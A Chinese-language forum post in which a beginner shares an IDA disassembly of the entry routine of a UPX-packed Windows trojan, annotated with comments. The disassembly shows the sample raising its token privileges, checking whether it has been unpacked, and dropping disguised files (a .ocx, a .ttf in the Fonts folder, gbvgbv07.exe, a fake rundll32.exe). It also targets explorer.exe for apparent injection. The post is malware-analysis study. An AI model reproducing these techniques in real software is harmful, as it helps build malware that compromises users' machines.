由于是第一次在论坛发贴,只是练练逆向的水平,..第一次分析这类病毒,不好的地方不要喷谢谢...
ida 分析如下:
代码:
UPX0:00401DA4 start proc near ; CODE XREF: UPX1:004136D8j UPX0:00401DA4 UPX0:00401DA4 CommandLine= byte ptr -0B5Ch UPX0:00401DA4 var_B5B= byte ptr -0B5Bh UPX0:00401DA4 szCurrentModuleFileName= byte ptr -954h UPX0:00401DA4 hFile= byte ptr -850h UPX0:00401DA4 szGbvgbv07= byte ptr -74Ch UPX0:00401DA4 NewFileName= byte ptr -648h UPX0:00401DA4 FileName= byte ptr -544h UPX0:00401DA4 Dest = byte ptr -440h UPX0:00401DA4 szIme_Temp= byte ptr -33Ch UPX0:00401DA4 hObject= byte ptr -238h UPX0:00401DA4 Array_22E= byte ptr -22Eh UPX0:00401DA4 szWindowsDirectory1= byte ptr -134h UPX0:00401DA4 Array_127= byte ptr -127h UPX0:00401DA4 szFileName= byte ptr -30h UPX0:00401DA4 Exlorer.exe= byte ptr -1Ch UPX0:00401DA4 var_1B= byte ptr -1Bh UPX0:00401DA4 var_1A= byte ptr -1Ah UPX0:00401DA4 var_19= byte ptr -19h UPX0:00401DA4 var_18= byte ptr -18h UPX0:00401DA4 var_17= byte ptr -17h UPX0:00401DA4 var_16= byte ptr -16h UPX0:00401DA4 var_15= byte ptr -15h UPX0:00401DA4 var_14= byte ptr -14h UPX0:00401DA4 var_13= byte ptr -13h UPX0:00401DA4 var_12= byte ptr -12h UPX0:00401DA4 var_11= byte ptr -11h UPX0:00401DA4 var_10= byte ptr -10h UPX0:00401DA4 SzFontsDir= byte ptr -0Ch UPX0:00401DA4 nNumberOfBytesToWrite= byte ptr -4 UPX0:00401DA4 UPX0:00401DA4 push ebp UPX0:00401DA5 mov ebp, esp UPX0:00401DA7 sub esp, 2908 UPX0:00401DAD push ebx UPX0:00401DAE push esi UPX0:00401DAF push edi UPX0:00401DB0 push 62 UPX0:00401DB2 xor ebx, ebx UPX0:00401DB4 pop ecx UPX0:00401DB5 xor eax, eax UPX0:00401DB7 lea edi, [ebp+Array_22E] UPX0:00401DBD mov [ebp+hObject], 'w' UPX0:00401DC4 mov [ebp+hObject+1], 'i' UPX0:00401DCB mov [ebp+hObject+2], 'n' UPX0:00401DD2 mov [ebp+hObject+3], 'n' UPX0:00401DD9 mov [ebp+hObject+4], 't' UPX0:00401DE0 mov [ebp+hObject+5], '.' UPX0:00401DE7 mov [ebp+hObject+6], 'c' UPX0:00401DEE mov [ebp+hObject+7], 'o' UPX0:00401DF5 mov [ebp+hObject+8], 'm' UPX0:00401DFC mov [ebp+hObject+9], bl UPX0:00401E02 rep stosd UPX0:00401E04 stosw UPX0:00401E06 push 64 UPX0:00401E08 xor eax, eax UPX0:00401E0A pop ecx UPX0:00401E0B lea edi, [ebp+Dest+1] UPX0:00401E11 mov [ebp+Dest], bl UPX0:00401E17 mov esi, sprintf UPX0:00401E1D rep stosd UPX0:00401E1F stosw UPX0:00401E21 stosb UPX0:00401E22 push offset a005 ; "005" UPX0:00401E27 lea eax, [ebp+Dest] UPX0:00401E2D push offset Format ; "dbr99%s.ocx" UPX0:00401E32 push eax ; Dest UPX0:00401E33 mov [ebp+nNumberOfBytesToWrite], 'T' UPX0:00401E37 mov [ebp+nNumberOfBytesToWrite+1], 'L' UPX0:00401E3B mov [ebp+nNumberOfBytesToWrite+2], 'S' UPX0:00401E3F mov [ebp+nNumberOfBytesToWrite+3], bl UPX0:00401E42 call esi ; sprintf ; UPX0:00401E42 ; sprintf(&dest, "dbr99%s.ocx", "005"); 不知道为什么这样写. UPX0:00401E42 ; UPX0:00401E44 add esp, 0Ch UPX0:00401E47 xor eax, eax UPX0:00401E49 lea edi, [ebp+FileName+1] UPX0:00401E4F mov [ebp+FileName], bl UPX0:00401E55 push 64 UPX0:00401E57 mov [ebp+szIme_Temp], bl UPX0:00401E5D pop ecx UPX0:00401E5E mov [ebp+szWindowsDirectory1], 'r' UPX0:00401E65 rep stosd UPX0:00401E67 stosw UPX0:00401E69 stosb UPX0:00401E6A push 64 UPX0:00401E6C xor eax, eax UPX0:00401E6E pop ecx UPX0:00401E6F lea edi, [ebp+szIme_Temp+1] UPX0:00401E75 rep stosd UPX0:00401E77 stosw UPX0:00401E79 stosb ; UPX0:00401E79 ; 以上代码是两个memset 260个元素的数组清0,加入了流水线乱序,看着比较郁闷 UPX0:00401E7A push 61 UPX0:00401E7C xor eax, eax UPX0:00401E7E pop ecx UPX0:00401E7F lea edi, [ebp+Array_127] UPX0:00401E85 mov [ebp+szWindowsDirectory1+1], 'u' UPX0:00401E8C mov [ebp+szWindowsDirectory1+2], 'n' UPX0:00401E93 mov [ebp+szWindowsDirectory1+3], 'd' UPX0:00401E9A mov [ebp+szWindowsDirectory1+4], 'l' UPX0:00401EA1 mov [ebp+szWindowsDirectory1+5], 'l' UPX0:00401EA8 mov [ebp+szWindowsDirectory1+6], '3' UPX0:00401EAF mov [ebp+szWindowsDirectory1+7], '2' UPX0:00401EB6 mov [ebp+szWindowsDirectory1+8], '.' UPX0:00401EBD mov [ebp+szWindowsDirectory1+9], 'e' UPX0:00401EC4 mov [ebp+szWindowsDirectory1+0Ah], 'x' UPX0:00401ECB mov [ebp+szWindowsDirectory1+0Bh], 'e' UPX0:00401ED2 mov [ebp+szWindowsDirectory1+0Ch], bl UPX0:00401ED8 rep stosd UPX0:00401EDA stosw UPX0:00401EDC stosb UPX0:00401EDD push 64 UPX0:00401EDF xor eax, eax UPX0:00401EE1 pop ecx UPX0:00401EE2 lea edi, [ebp+szGbvgbv07+1] UPX0:00401EE8 mov [ebp+szGbvgbv07], bl UPX0:00401EEE rep stosd UPX0:00401EF0 stosw UPX0:00401EF2 stosb UPX0:00401EF3 call ChangeProcessToken ; 修改进程令牌权限 UPX0:00401EF8 mov edi, 260 UPX0:00401EFD lea eax, [ebp+szCurrentModuleFileName] UPX0:00401F03 push edi ; nSize UPX0:00401F04 push eax ; lpFilename UPX0:00401F05 push ebx ; hModule UPX0:00401F06 call GetModuleFileNameA ; UPX0:00401F06 ; 获取一个已装载模板的完整路径名称,hModule 为空则获取当前模块. UPX0:00401F0C lea eax, [ebp+szFileName] UPX0:00401F0F push offset aDbr07028 ; "dbr07028" UPX0:00401F14 push eax ; Dest UPX0:00401F15 call esi ; sprintf ; UPX0:00401F15 ; sprintf(&szFileName, "dbr07028"); UPX0:00401F17 lea eax, [ebp+szFileName] UPX0:00401F1A push eax UPX0:00401F1B lea eax, [ebp+NewFileName] UPX0:00401F21 push eax UPX0:00401F22 call _mbscpy ; UPX0:00401F22 ; _mbscpy(&NewFileName, &szFileName); UPX0:00401F27 lea eax, [ebp+NewFileName] UPX0:00401F2D push offset a_ocx ; ".ocx" UPX0:00401F32 push eax UPX0:00401F33 call _mbscat ; UPX0:00401F33 ; _mbscat(&NewFileName, ".ocx"); 字符串连接 UPX0:00401F38 lea eax, [ebp+NewFileName] UPX0:00401F3E push eax UPX0:00401F3F lea eax, [ebp+NewFileName] UPX0:00401F45 push eax UPX0:00401F46 call MyGetWindowsDirectory ; UPX0:00401F46 ; 病毒作者, 这里不知道为什么传2个Newfilename的地址进去,都是传进传出值. UPX0:00401F46 ; 得到 要生成木马的全部路径 UPX0:00401F4B lea eax, [ebp+szCurrentModuleFileName] UPX0:00401F51 push eax ; NumberOfBytesRead UPX0:00401F52 call Decrypt_PostAddress ; UPX0:00401F52 ; 对一些加密的数据进行的解密操作,并且检查是否程序被脱壳. UPX0:00401F57 add esp, 24h UPX0:00401F5A lea eax, [ebp+hFile] UPX0:00401F60 mov [ebp+SzFontsDir], '\' UPX0:00401F64 mov [ebp+SzFontsDir+1], 'f' UPX0:00401F68 push edi ; uSize UPX0:00401F69 push eax ; lpBuffer UPX0:00401F6A mov [ebp+SzFontsDir+2], 'o' UPX0:00401F6E mov [ebp+SzFontsDir+3], 'n' UPX0:00401F72 mov [ebp+SzFontsDir+4], 't' UPX0:00401F76 mov [ebp+SzFontsDir+5], 's' UPX0:00401F7A mov [ebp+SzFontsDir+6], '\' UPX0:00401F7E mov [ebp+SzFontsDir+7], bl UPX0:00401F81 call GetWindowsDirectoryA UPX0:00401F87 lea eax, [ebp+SzFontsDir] UPX0:00401F8A push eax UPX0:00401F8B lea eax, [ebp+hFile] UPX0:00401F91 push eax UPX0:00401F92 call _mbscat ; UPX0:00401F92 ; 合并目录,估计要在windows目录下创建这个目录. UPX0:00401F97 lea eax, [ebp+szFileName] UPX0:00401F9A push eax UPX0:00401F9B lea eax, [ebp+hFile] UPX0:00401FA1 push eax UPX0:00401FA2 call _mbscat ; UPX0:00401FA2 ; + "dbr07028" UPX0:00401FA7 lea eax, [ebp+hFile] UPX0:00401FAD push offset a_ttf ; ".ttf" UPX0:00401FB2 push eax UPX0:00401FB3 call _mbscat ; UPX0:00401FB3 ; +",ttf" UPX0:00401FB8 lea eax, [ebp+hFile] UPX0:00401FBE push eax ; hFile UPX0:00401FBF call _CreateFile_Encryption UPX0:00401FC4 mov edi, GetTickCount UPX0:00401FCA add esp, 1Ch UPX0:00401FCD call edi ; GetTickCount ; 取系统开机到目前的运行时间.貌似求随机数. UPX0:00401FCF push eax UPX0:00401FD0 lea eax, [ebp+FileName] UPX0:00401FD6 push offset a08xmdd_temp ; "%08Xmdd.temp" UPX0:00401FDB push eax ; Dest UPX0:00401FDC call esi ; sprintf ; UPX0:00401FDC ; sprintf(&eax, "%08xmdd.temp", eax); UPX0:00401FDE lea eax, [ebp+FileName] UPX0:00401FE4 push eax UPX0:00401FE5 lea eax, [ebp+FileName] UPX0:00401FEB push eax UPX0:00401FEC call GetTempPath_Set UPX0:00401FF1 lea eax, [ebp+FileName] UPX0:00401FF7 push eax ; lpFileName UPX0:00401FF8 lea eax, [ebp+nNumberOfBytesToWrite] UPX0:00401FFB push 66h ; NumberOfBytesWritten UPX0:00401FFD push eax ; nNumberOfBytesToWrite UPX0:00401FFE push ebx ; hModule UPX0:00401FFF call CreateTempFile ; UPX0:00401FFF ; 传得是 CreateFile的参数.. UPX0:00402004 add esp, 24h UPX0:00402007 lea eax, [ebp+NewFileName] UPX0:0040200D push 3 ; dwFlags UPX0:0040200F push eax ; lpNewFileName UPX0:00402010 lea eax, [ebp+FileName] UPX0:00402016 push eax ; lpExistingFileName UPX0:00402017 call MoveFileExA ; 移动文件,替换原来的,目标存在覆盖. UPX0:0040201D call edi ; GetTickCount UPX0:0040201F push eax UPX0:00402020 lea eax, [ebp+szIme_Temp] UPX0:00402026 push offset a08xime_temp ; "%08Xime.temp" UPX0:0040202B push eax ; Dest UPX0:0040202C call esi ; sprintf ; 重复上面的创建临时文件的行为. UPX0:0040202E lea eax, [ebp+szIme_Temp] UPX0:00402034 push eax UPX0:00402035 lea eax, [ebp+szIme_Temp] UPX0:0040203B push eax UPX0:0040203C call GetTempPath_Set UPX0:00402041 lea eax, [ebp+szIme_Temp] UPX0:00402047 push eax ; lpFileName UPX0:00402048 lea eax, [ebp+nNumberOfBytesToWrite] UPX0:0040204B push 65h ; NumberOfBytesWritten UPX0:0040204D push eax ; nNumberOfBytesToWrite UPX0:0040204E push ebx ; hModule UPX0:0040204F call CreateTempFile UPX0:00402054 lea eax, [ebp+hObject] UPX0:0040205A push eax UPX0:0040205B lea eax, [ebp+hObject] UPX0:00402061 push eax UPX0:00402062 call MyGetWindowsDirectory UPX0:00402067 add esp, 2Ch UPX0:0040206A lea eax, [ebp+hObject] UPX0:00402070 push 3 ; dwFlags UPX0:00402072 push eax ; lpNewFileName UPX0:00402073 lea eax, [ebp+szIme_Temp] UPX0:00402079 push eax ; lpExistingFileName UPX0:0040207A call MoveFileExA UPX0:00402080 call edi ; GetTickCount UPX0:00402082 push eax UPX0:00402083 lea eax, [ebp+szIme_Temp] UPX0:00402089 push offset a08xeime_temp ; "%08Xeime.temp" UPX0:0040208E push eax ; Dest UPX0:0040208F call esi ; sprintf UPX0:00402091 lea eax, [ebp+szIme_Temp] UPX0:00402097 push eax UPX0:00402098 lea eax, [ebp+szIme_Temp] UPX0:0040209E push eax UPX0:0040209F call GetTempPath_Set UPX0:004020A4 lea eax, [ebp+szIme_Temp] UPX0:004020AA push eax ; lpFileName UPX0:004020AB lea eax, [ebp+nNumberOfBytesToWrite] UPX0:004020AE push 67h ; NumberOfBytesWritten UPX0:004020B0 push eax ; nNumberOfBytesToWrite UPX0:004020B1 push ebx ; hModule UPX0:004020B2 call CreateTempFile UPX0:004020B7 lea eax, [ebp+Dest] UPX0:004020BD push eax UPX0:004020BE lea eax, [ebp+Dest] UPX0:004020C4 push eax UPX0:004020C5 call MyGetWindowsDirectory ; 得到系统目录. UPX0:004020CA add esp, 2Ch UPX0:004020CD lea eax, [ebp+Dest] UPX0:004020D3 push 3 ; dwFlags UPX0:004020D5 push eax ; lpNewFileName UPX0:004020D6 lea eax, [ebp+szIme_Temp] UPX0:004020DC push eax ; lpExistingFileName UPX0:004020DD call MoveFileExA ; 把刚刚创建的szime的文件,复制到创建的文件夹下 UPX0:004020E3 lea eax, [ebp+szWindowsDirectory1] UPX0:004020E9 push eax UPX0:004020EA lea eax, [ebp+szWindowsDirectory1] UPX0:004020F0 push eax UPX0:004020F1 call MyGetWindowsDirectory UPX0:004020F6 lea eax, [ebp+szGbvgbv07] UPX0:004020FC push eax UPX0:004020FD push offset aGbvgbv07_exe ; "gbvgbv07.exe" UPX0:00402102 call MyGetWindowsDirectory ; 此函数多次调用,每次调用都是对系统里创建了东西,具体可根据od载入分析. UPX0:00402107 add esp, 10h UPX0:0040210A lea eax, [ebp+szGbvgbv07] UPX0:00402110 push ebx ; bFailIfExists UPX0:00402111 push eax ; lpNewFileName UPX0:00402112 lea eax, [ebp+szWindowsDirectory1] UPX0:00402118 push eax ; lpExistingFileName UPX0:00402119 call CopyFileA UPX0:0040211F lea eax, [ebp+hObject] UPX0:00402125 mov [ebp+Exlorer.exe], 'e' UPX0:00402129 push eax ; hObject UPX0:0040212A lea eax, [ebp+Exlorer.exe] UPX0:0040212D push eax ; Exlorer.exe UPX0:0040212E mov [ebp+var_1B], 'x' UPX0:00402132 mov [ebp+var_1A], 'p' UPX0:00402136 mov [ebp+var_19], 'l' UPX0:0040213A mov [ebp+var_18], 'o' UPX0:0040213E mov [ebp+var_17], 'r' UPX0:00402142 mov [ebp+var_16], 'e' UPX0:00402146 mov [ebp+var_15], 'r' UPX0:0040214A mov [ebp+var_14], '.' UPX0:0040214E mov [ebp+var_13], 'e' UPX0:00402152 mov [ebp+var_12], 'x' UPX0:00402156 mov [ebp+var_11], 'e' UPX0:0040215A mov [ebp+var_10], bl UPX0:0040215D call FindExplorer ; explorer.exe 貌似想注入. UPX0:00402162 mov ecx, 81h UPX0:00402167 xor eax, eax UPX0:00402169 lea edi, [ebp+var_B5B] UPX0:0040216F mov [ebp+CommandLine], bl UPX0:00402175 rep stosd UPX0:00402177 stosw UPX0:00402179 stosb UPX0:0040217A lea eax, [ebp+NewFileName] UPX0:00402180 push eax ; lpFileName UPX0:00402181 call sub_401894 UPX0:00402186 mov esi, WsPrintf UPX0:0040218C add esp, 0Ch UPX0:0040218F test eax, eax UPX0:00402191 jz short loc_4021C5 UPX0:00402193 lea eax, [ebp+szCurrentModuleFileName] UPX0:00402199 push eax ; _DWORD UPX0:0040219A lea eax, [ebp+NewFileName] UPX0:004021A0 push eax ; _DWORD UPX0:004021A1 lea eax, [ebp+szGbvgbv07] UPX0:004021A7 push eax ; _DWORD UPX0:004021A8 lea eax, [ebp+CommandLine] UPX0:004021AE push offset aSSPfjaoidjglka ; "%s %s pfjaoidjglkajd %s" UPX0:004021B3 push eax ; _DWORD UPX0:004021B4 call esi ; WsPrintf UPX0:004021B6 lea eax, [ebp+CommandLine] UPX0:004021BC push eax ; lpCommandLine UPX0:004021BD call sub_401CAC UPX0:004021C2 add esp, 18h UPX0:004021C5 UPX0:004021C5 loc_4021C5: ; CODE XREF: start+3EDj UPX0:004021C5 lea eax, [ebp+Dest] UPX0:004021CB push eax ; lpFileName UPX0:004021CC call sub_401894 UPX0:004021D1 test eax, eax UPX0:004021D3 pop ecx UPX0:004021D4 jz short loc_402201 UPX0:004021D6 lea eax, [ebp+Dest] UPX0:004021DC push eax ; _DWORD UPX0:004021DD lea eax, [ebp+szGbvgbv07] UPX0:004021E3 push eax ; _DWORD UPX0:004021E4 lea eax, [ebp+CommandLine] UPX0:004021EA push offset aSSPfjieaoidjgl ; "%s %s pfjieaoidjglkajd" UPX0:004021EF push eax ; _DWORD UPX0:004021F0 call esi ; WsPrintf UPX0:004021F2 lea eax, [ebp+CommandLine] UPX0:004021F8 push eax ; lpCommandLine UPX0:004021F9 call sub_401CAC UPX0:004021FE add esp, 14h UPX0:00402201 UPX0:00402201 loc_402201: ; CODE XREF: start+430j UPX0:00402201 push ebx ; uExitCode UPX0:00402202 call ExitProcess UPX0:00402208 ; --------------------------------------------------------------------------- UPX0:00402208 push 1 UPX0:0040220A pop eax UPX0:0040220B pop edi UPX0:0040220C pop esi UPX0:0040220D pop ebx UPX0:0040220E leave UPX0:0040220E start endp ; sp-analysis failed UPX0:0040220E UPX0:0040220F retn 10h
欢迎讨论.